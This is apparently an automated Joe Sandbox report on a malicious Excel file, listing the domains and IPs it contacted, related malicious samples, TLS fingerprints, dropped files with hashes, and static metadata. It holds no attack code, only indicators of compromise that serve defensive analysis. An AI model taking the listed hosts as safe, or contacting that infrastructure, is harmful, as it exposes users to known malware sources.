                                                                                                                                                      https://staging.cortana.ai05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      192.185.39.58
                                                                                                                                                      signifysystem.comUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                      192.185.32.232
                                                                                                                                                      fcventasyservicios.clUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                      Analysis ID:412299
                                                                                                                                                      Start date:12.05.2021
                                                                                                                                                      Start time:15:46:21
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 5m 20s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:afdab907_by_Libranalysis.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:29
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal68.expl.evad.winXLS@5/7@2/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      192.185.39.58afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                    46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                      192.185.32.232afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                        8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                            32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                              32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                                                      Domains

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      signifysystem.com8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      fcventasyservicios.clafdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232

                                                                                                                                                                                      ASN

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      UNIFIEDLAYER-AS-1USafdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.254.185.244
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.232.222.43
                                                                                                                                                                                      abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 67.20.76.71
                                                                                                                                                                                      Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.171.219
                                                                                                                                                                                      DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                      dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.171.219
                                                                                                                                                                                      RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.129.32
                                                                                                                                                                                      Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.241.62.63
                                                                                                                                                                                      in.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.241.244.112
                                                                                                                                                                                      PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.144.13.239
                                                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 108.167.180.164
                                                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 108.167.180.164
                                                                                                                                                                                      UNIFIEDLAYER-AS-1USafdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.254.185.244
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.232.222.43
                                                                                                                                                                                      abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 67.20.76.71
                                                                                                                                                                                      Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.171.219
                                                                                                                                                                                      DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                      dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.171.219
                                                                                                                                                                                      RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.129.32
                                                                                                                                                                                      Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.241.62.63
                                                                                                                                                                                      in.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.241.244.112
                                                                                                                                                                                      PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.144.13.239
                                                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 108.167.180.164
                                                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 108.167.180.164

                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e198100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      - FAX ID 74172012198198.htmGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      #Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htmGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      Cotizacii#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      Cotizaci#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58
                                                                                                                                                                                      statistic-1310760242.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 192.185.32.232
                                                                                                                                                                                      • 192.185.39.58

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      No context

                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\05A0640A-6863-4E3B-ACA9-DB328E6298FA
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):134558
                                                                                                                                                                                      Entropy (8bit):5.368396608243579
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:icQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:JEQ9DQW+zPXO8
                                                                                                                                                                                      MD5:88B73846BB777A00366882408FC6567F
                                                                                                                                                                                      SHA1:7D28D03A7875D0A011CAF9A89E651C1E7B0B781F
                                                                                                                                                                                      SHA-256:3BB56B5BC4929DD2CF5EEB0863CB5422D18F08514EB271DC910DF5CB88D8351C
                                                                                                                                                                                      SHA-512:7A346AD24673FE4EC996C3A6A4DC2B2737335BEB84F3C0680D8BF2E939F049318225756441F7EDED73065D1D29E8F4A90DE1BFA51F8764AB3E50C98CF2CE1DAA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T13:47:18">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\C1C10000
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):81549
                                                                                                                                                                                      Entropy (8bit):7.91028961887938
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:BjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJtS:N+nHSD8YZo/Uh0ZymYQ0y7FAL/S
                                                                                                                                                                                      MD5:E921F271D6866098E505D8B239E42FA5
                                                                                                                                                                                      SHA1:DBF2420C5D3CCE5157A16EC8EF5214557BB095A5
                                                                                                                                                                                      SHA-256:C32346707C8DCDDE3711A1538374A7401EE830763A4324BD952DAE9326D80449
                                                                                                                                                                                      SHA-512:54D081FC3633B0739EE463B07B8A606B190BA1147D3D87F0C62EF4377D452993632908E73F84CFC9F2F084D69024BB7D7BDE981263A47D03A1C7292CFC83B882
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Wed May 12 21:47:20 2021, atime=Wed May 12 21:47:20 2021, length=12288, window=hide
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):909
                                                                                                                                                                                      Entropy (8bit):4.711159087321218
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:8mp3ncJRUZ6CHiD0/GXIDN+W+jA0/y1bDyPq5LkeGLkeM4t2Y+xIBjKZm:8u3ni10Oy+A0KJDyPG7aB6m
                                                                                                                                                                                      MD5:A1D94C508552D2F0F75AE58820C0D8A8
                                                                                                                                                                                      SHA1:4C7919B0DAE3C5C7AD4BADE84178E6B75990163A
                                                                                                                                                                                      SHA-256:1DDCCE4C89118101E55072CD12BDC571A846107732C359B823B48D2EE84A5051
                                                                                                                                                                                      SHA-512:C1C3156C3275783F29ADE33CA7DDBDAFF24EC0762376F3FC6E3FC96FA1E9D9F0C187AF209CEFF0819ADC395D8EE678E92B14EC2CC589FA40C491E7609F8FE9C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: L..................F............-..T.W.G....U.G...0......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R......S....................n...a.l.f.o.n.s.....~.1......R...Desktop.h.......NM..R......Y..............>.....*9..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......980108...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\afdab907_by_Libranalysis.LNK
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:08 2020, mtime=Wed May 12 21:47:20 2021, atime=Wed May 12 21:47:20 2021, length=177152, window=hide
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2260
                                                                                                                                                                                      Entropy (8bit):4.732256918860942
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:8NTL7HeOEXTKhVNKOESB6pNTL7HeOEXTKhVNKOESB6:88FeXNKFSK8FeXNKFS
                                                                                                                                                                                      MD5:53F19E889CBBC44B5439EBEC5CC58D91
                                                                                                                                                                                      SHA1:A380C1E106661E3959A870FE0F7037A59FD37017
                                                                                                                                                                                      SHA-256:DC503BE2EFFBCB1A00F81F3B2E64BB16BC71CBE22A80468D7DC1241595D3C765
                                                                                                                                                                                      SHA-512:1603E056F22CB6ED822E8495C4DF17EE8EB4E2F99DCE40A528DBD58A11D18771A6FB8DED1C9A1D559ACA2C770DD25403D395CDA67726CC183BC095026BA37D55
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: L..................F.... ....l).8...iem.G..iem.G...............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R......S....................n...a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R......Y..............>.....b9..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R. .AFDAB9~1.XLS..j......>Q.u.R.....f.......................9.a.f.d.a.b.9.0.7._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......c...............-.......b...........>.S......C:\Users\user\Desktop\afdab907_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.f.d.a.b.9.0.7._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Aw...`.......X.......980108...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3
                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):125
                                                                                                                                                                                      Entropy (8bit):4.605232209042294
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:oyBVomMSZGUwSLMp6lcDBEEGUwSLMp6lmMSZGUwSLMp6lv:dj6SDNiyCNbSDNf
                                                                                                                                                                                      MD5:85121F807F772BC7FB4410CA5583907A
                                                                                                                                                                                      SHA1:D7A223F4FE7FDEA95B5CC43B0BD686A3CD98CC1E
                                                                                                                                                                                      SHA-256:BE44E6D35861347BCB4FDB71496734B6ECDA5B6C6EB8C4FA1D5311ED47AFDC7A
                                                                                                                                                                                      SHA-512:30F9D464C54A9DDA0701900C234C58F0FFD5DCFC5A477FEE04FB92FA0727A10B02D37F106F7DC52FBB999B7B7C70EC3B355C4A143D5F6A281E8B41A28BF398B4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..afdab907_by_Libranalysis.LNK=0..afdab907_by_Libranalysis.LNK=0..[xls]..afdab907_by_Libranalysis.LNK=0..
                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                      C:\Users\user\Desktop\B2C10000
                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):228873
                                                                                                                                                                                      Entropy (8bit):5.616369521937339
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:17NiRdSD8YNoTU90upfzn3bO0X7vrPlsrXvLlL7La7Niuh:aRdTrTU9ZEbuh
                                                                                                                                                                                      MD5:A8202F9867B93EB004F967A73E59B139
                                                                                                                                                                                      SHA1:D417726147FBBDCB9A943D4767959D66C7CCEF76
                                                                                                                                                                                      SHA-256:2FF90CF27DAE349180077792AF6E99D612BBBBA551172EE5C928D649CD91F8AD
                                                                                                                                                                                      SHA-512:C8D3A57DB78581941015F0D66140BAEF629BCB96C6A2ED98E8974A974916DD0EFE63434A49F9DBEBE52FF93459C6BFA0447DB0C6F12673B66212DA3E40E50A43
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1.......>..........A.r.i.a.l.1.......?..........A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1...............

                                                                                                                                                                                      Static File Info

                                                                                                                                                                                      General

                                                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                                                      Entropy (8bit):3.258986427712615
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
